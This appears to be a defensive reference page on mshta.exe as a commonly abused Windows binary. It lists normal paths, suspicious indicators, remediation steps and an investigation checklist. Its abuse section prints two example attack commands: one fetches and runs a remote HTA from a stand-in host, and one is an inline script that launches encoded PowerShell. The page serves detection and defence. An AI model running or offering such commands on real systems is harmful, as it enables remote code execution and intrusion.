High Risk | Windows | Legitimate | Commonly Abused
mshta.exe - SYSTEM UTILITY

mshta.exe - HTML Application Host Security Analysis

mshta.exe executes HTML Applications (.HTA files). It is a critical LOLBin abused to execute remote payloads, bypass application controls, and deliver phishing attacks. Any network activity or execution from URLs is highly suspicious.

Last verified: Jan 18, 2026

Risk Summary

HIGH priority. mshta.exe executing URLs or remote content is a strong indicator of compromise. Block mshta.exe for non-administrative users if possible.

Overview

What is mshta.exe?

mshta.exe is the Microsoft HTML Application Host, executing .HTA files.

Security Significance

  • LOLBin: Living-off-the-Land Binary
  • Remote Execution: Can execute HTA from URLs
  • Script Execution: Runs VBScript/JScript
  • Defense Evasion: Bypasses script restrictions

Normal Behavior

Property        Expected Value
Path            C:\Windows\System32\mshta.exe
Path (32-bit)   C:\Windows\SysWOW64\mshta.exe
Usage           Rare in enterprise environments

Common Locations

C:\Windows\System32\mshta.exe
C:\Windows\SysWOW64\mshta.exe

Suspicious Indicators

Indicator                  Risk
URL in command line        CRITICAL
VBScript/JScript inline    CRITICAL
Parent is Office app       CRITICAL
Network connections        HIGH

Abuse Techniques

Attack Techniques

Remote HTA Execution

mshta.exe http://evil.com/payload.hta
mshta.exe "javascript:a=(new ActiveXObject('Wscript.Shell')).Run('powershell -enc ...');"

Phishing Delivery

HTA files are sent via email or downloaded from malicious sites.

Remediation Steps

  1. Block mshta.exe for standard users
  2. Monitor all mshta.exe execution
  3. Analyze command-line arguments
  4. Check for downloaded payloads

Investigation Checklist

  • Check command line for URLs
  • Review parent process
  • Check network connections
  • Analyze any downloaded files
  • Look for persistence mechanisms

MITRE ATT&CK Techniques